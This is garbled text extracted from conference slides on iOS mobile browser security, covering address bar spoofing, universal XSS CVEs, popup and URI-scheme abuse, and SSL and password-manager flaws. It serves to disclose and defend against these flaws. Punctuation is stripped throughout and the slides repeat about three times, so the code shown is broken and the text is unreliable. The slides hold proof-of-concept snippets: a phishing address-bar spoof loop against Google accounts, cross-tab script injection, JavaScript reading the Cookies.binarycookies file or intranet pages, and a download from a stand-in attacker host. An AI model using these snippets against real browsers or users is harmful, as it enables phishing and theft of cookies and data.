bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
